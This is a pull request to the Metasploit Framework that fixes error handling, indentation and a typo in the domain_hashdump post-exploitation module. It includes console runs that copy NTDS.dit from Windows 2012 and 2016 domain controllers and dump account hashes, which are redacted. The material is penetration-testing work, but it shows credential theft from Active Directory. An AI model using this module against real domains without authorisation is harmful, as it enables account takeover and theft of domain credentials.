### PR TITLE
Updated domain_hashdump fix

### DIFF
--- a/modules/post/windows/gather/credentials/domain_hashdump.rb
+++ b/modules/post/windows/gather/credentials/domain_hashdump.rb
@@ -12,6 +12,7 @@ class MetasploitModule < Msf::Post
   include Msf::Post::Windows::Priv
   include Msf::Post::Windows::ShadowCopy
   include Msf::Post::File
+  include Msf::Post::Windows::ExtAPI
 
   def initialize(info={})
     super(update_info(info,
@@ -115,6 +116,7 @@ class MetasploitModule < Msf::Post
     unless session_compat?
       return false
     end
+    load_extapi
     return true
   end
 

--- a/modules/post/windows/gather/credentials/domain_hashdump.rb
+++ b/modules/post/windows/gather/credentials/domain_hashdump.rb
@@ -44,27 +44,27 @@ class MetasploitModule < Msf::Post
         print_status repair_ntds(ntds_file)
         realm = sysinfo["Domain"]
         begin
-		  ntds_parser = Metasploit::Framework::NTDS::Parser.new(client, ntds_file)
-		rescue Rex::Post::Meterpreter::RequestError => e
-		  print_bad("Failed to properly parse database: #{e}")
-		  if e.to_s.include? "1004"
-		    print_bad("Error 1004 is likely a jet database error because the ntds database is not in the regular format")
-		  end
-		end
-		unless ntds_parser.nil?
-			print_status "Started up NTDS channel. Preparing to stream results..."
-			ntds_parser.each_account do |ad_account|
-			  print_good ad_account.to_s
-			  report_hash(ad_account.ntlm_hash.downcase, ad_account.name, realm)
-			  ad_account.nt_history.each_with_index do |nt_hash, index|
-				hash_string = ad_account.lm_history[index] || Metasploit::Credential::NTLMHash::BLANK_LM_HASH
-				hash_string << ":#{nt_hash}"
-				report_hash(hash_string.downcase,ad_account.name, realm)
+          ntds_parser = Metasploit::Framework::NTDS::Parser.new(client, ntds_file)
+        rescue Rex::Post::Meterpreter::RequestError => e
+          print_bad("Failed to properly parse database: #{e}")
+          if e.to_s.include? "1004"
+            print_bad("Error 1004 is likely a jet database error because the ntds database is not in the regular format")
+          end
+        end
+        unless ntds_parser.nil?
+          print_status "Started up NTDS channel. Preparing to stream results..."
+          ntds_parser.each_account do |ad_account|
+            print_good ad_account.to_s
+            report_hash(ad_account.ntlm_hash.downcase, ad_account.name, realm)
+            ad_account.nt_history.each_with_index do |nt_hash, index|
+              hash_string = ad_account.lm_history[index] || Metasploit::Credential::NTLMHash::BLANK_LM_HASH
+              hash_string << ":#{nt_hash}"
+              report_hash(hash_string.downcase,ad_account.name, realm)
             end
           end
         end
         if datastore['cleanup']
-	      print_status "Deleting backup of NTDS.dit at #{ntds_file}"
+          print_status "Deleting backup of NTDS.dit at #{ntds_file}"
           rm_f(ntds_file)
         else
           print_bad "#{ntds_file} requires manual cleanup"

--- a/modules/post/windows/gather/credentials/domain_hashdump.rb
+++ b/modules/post/windows/gather/credentials/domain_hashdump.rb
@@ -108,7 +108,7 @@ class MetasploitModule < Msf::Post
       return false
     end
     if is_domain_controller?
-      print_status "Sessions is on a Domain Controller"
+      print_status "Session is on a Domain Controller"
     else
       print_error "This does not appear to be an AD Domain Controller"
       return false


### PR DESCRIPTION
The domain hashdump post module does not appear work with all 2016 domain controllers.  There are some fundamental reasons why that I will cover in an issue later.  Because there are reports it _will_ work sometimes, I did not disable running it on 2016, but instead, this PR adds specific error handling to the failure expected in Windows 2016 domain controllers and cleans up after the failure with an option not to clean up so you can grab the database manually and try to parse it offline (The file can be really big, so be careful).  It is an extension of 
https://github.com/rapid7/metasploit-framework/pull/8868

List the steps needed to make sure this thing works

- [x] Start `msfconsole`
- [x] Get an admin-level session on a windows 2012 domain controller
- [x] `use post/windows/gather/credentials/domain_hashdump`
- [x] `set session<id>`
- [x] `run`
- [ ] **Verify** You get hashes
- [x] Repeat on 2016 Domain controller
- [x] `run`
- [x] **Verify** it fails with a warning like this:
```
[-] Failed to properly parse database: extapi_ntds_parse: Operation failed: 1004
[-] Error 1004 is likely a jet database error because the ntds database is not in the regular format
```
- [x] **Verify** it cleans up the temp database it created:
`[*] Deleting backup of NTDS.dit at C:\Windows\Temp\kKvTZJeSqqx\Active Directory\ntds.dit`
- [x] Repeat on 2016 Domain controller
- [x] `set cleanup false`
- [x] `run`
- [x] **Verify** it warns that the database was not cleaned up:
`[-] C:\Windows\Temp\JmGGgmTBB\Active Directory\ntds.dit requires manual cleanup`

## Sample Run on Windows 2012:
```
msf exploit(psexec) > use post/windows/gather/credentials/domain_hashdump 
msf post(domain_hashdump) > set session 1
session => 1
msf post(domain_hashdump) > run

[*] Session has Admin privs
[*] Session is on a Domain Controller
[*] Pre-conditions met, attempting to copy NTDS.dit
[*] Using NTDSUTIL method
[*] NTDS database copied to C:\Windows\Temp\LAYsZRueiMuC\Active Directory\ntds.dit
[*] NTDS File Size: 35667968 bytes
[*] Repairing NTDS database after copy...
[*] 
Initiating REPAIR mode...
        Database: C:\Windows\Temp\LAYsZRueiMuC\Active Directory\ntds.dit
  Temp. Database: TEMPREPAIR2808.EDB

Checking database integrity.

                     Scanning Status (% complete)

          0    10   20   30   40   50   60   70   80   90  100
          |----|----|----|----|----|----|----|----|----|----|
          ...................................................


Integrity check successful.

Note:
  It is recommended that you immediately perform a full backup
  of this database. If you restore a backup made before the
  repair, the database will be rolled back to the state
  it was in at the time of that backup.

Operation completed successfully in 0.437 seconds.

[*] Started up NTDS channel. Preparing to stream results...
[+] Administrator (Built-in account for administering the computer/domain)
Administrator:500:[redacted]
Password Expires: Monday, January 1, 1601
Last Password Change: 6:51:27 PM Thursday, November 2, 2017
Last Logon: 7:32:32 PM Thursday, November 2, 2017
Logon Count: 5
 - Password Never Expires

Hash History:


[+]          Guest (Built-in account for guest access to the computer/domain)
         Guest:501:[redacted]
         Password Expires: Never
         Last Password Change: 12:00:00 AM Monday, January 1, 1601
         Last Logon: 12:00:00 AM Monday, January 1, 1601
         Logon Count: 0
          - Account Disabled
- Password Never Expires
- No Password Required

         Hash History:
         

[+] msfuser ()
msfuser:1001:[redacted]
Password Expires: Monday, January 1, 1601
Last Password Change: 6:26:55 PM Tuesday, May 30, 2017
Last Logon: 7:00:59 PM Friday, June 9, 2017
Logon Count: 5
 - Password Never Expires

Hash History:


[+] krbtgt (Key Distribution Center Service Account)
krbtgt:502:[redacted]
Password Expires: Br
Last Password Change: 7:26:04 PM Thursday, November 2, 2017
Last Logon: 12:00:00 AM Monday, January 1, 1601
Logon Count: 0
 - Account Disabled

Hash History:
krbtgt:502:[redacted]


[*] Deleting backup of NTDS.dit at C:\Windows\Temp\LAYsZRueiMuC\Active Directory\ntds.dit
[*] Post module execution completed
msf post(domain_hashdump) >
```

## Sample Run on Windows 2016:
```
meterpreter > sysinfo
Computer        : APT_WIN2016X64
OS              : Windows 2016 (Build 14393).
Architecture    : x64
System Language : en_US
Domain          : TESTDOMAIN
Logged On Users : 4
Meterpreter     : x64/windows
meterpreter > background
[*] Backgrounding session 1...
msf exploit(psexec) > use post/windows/gather/credentials/domain_hashdump 
msf post(domain_hashdump) > set session 1
session => 1
msf post(domain_hashdump) > run

[*] Session has Admin privs
[*] Session is on a Domain Controller
[*] Pre-conditions met, attempting to copy NTDS.dit
[*] Using NTDSUTIL method
[*] NTDS database copied to C:\Windows\Temp\kKvTZJeSqqx\Active Directory\ntds.dit
[*] NTDS File Size: 33554432 bytes
[*] Repairing NTDS database after copy...
[*] 
Initiating REPAIR mode...
        Database: C:\Windows\Temp\kKvTZJeSqqx\Active Directory\ntds.dit
  Temp. Database: TEMPREPAIR4028.EDB

Checking database integrity.

                     Scanning Status (% complete)

          0    10   20   30   40   50   60   70   80   90  100
          |----|----|----|----|----|----|----|----|----|----|
          ...................................................


Integrity check successful.

Note:
  It is recommended that you immediately perform a full backup
  of this database. If you restore a backup made before the
  repair, the database will be rolled back to the state
  it was in at the time of that backup.

Operation completed successfully in 0.438 seconds.

[-] Failed to properly parse database: extapi_ntds_parse: Operation failed: 1004
[-] Error 1004 is likely a jet database error because the ntds database is not in the regular format
[*] Deleting backup of NTDS.dit at C:\Windows\Temp\kKvTZJeSqqx\Active Directory\ntds.dit
[*] Post module execution completed
msf post(domain_hashdump) > show optinos
[-] Invalid parameter "optinos", use "show -h" for more information
msf post(domain_hashdump) > show options

Module options (post/windows/gather/credentials/domain_hashdump):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   CLEANUP  true             yes       Automatically delete ntds backup created
   RHOST    localhost        yes       Target address range
   SESSION  1                yes       The session to run this module on.
   TIMEOUT  60               yes       Timeout for WMI command in seconds

msf post(domain_hashdump) > set cleanup false
cleanup => false
msf post(domain_hashdump) > run

[*] Session has Admin privs
[*] Session is on a Domain Controller
[*] Pre-conditions met, attempting to copy NTDS.dit
[*] Using NTDSUTIL method
[*] NTDS database copied to C:\Windows\Temp\JmGGgmTBB\Active Directory\ntds.dit
[*] NTDS File Size: 33554432 bytes
[*] Repairing NTDS database after copy...
[*] 
Initiating REPAIR mode...
        Database: C:\Windows\Temp\JmGGgmTBB\Active Directory\ntds.dit
  Temp. Database: TEMPREPAIR1648.EDB

Checking database integrity.

                     Scanning Status (% complete)

          0    10   20   30   40   50   60   70   80   90  100
          |----|----|----|----|----|----|----|----|----|----|
          ...................................................


Integrity check successful.

Note:
  It is recommended that you immediately perform a full backup
  of this database. If you restore a backup made before the
  repair, the database will be rolled back to the state
  it was in at the time of that backup.

Operation completed successfully in 0.468 seconds.

[-] Failed to properly parse database: extapi_ntds_parse: Operation failed: 1004
[-] Error 1004 is likely a jet database error because the ntds database is not in the regular format
[-] C:\Windows\Temp\JmGGgmTBB\Active Directory\ntds.dit requires manual cleanup
[*] Post module execution completed
msf post(domain_hashdump) >
```

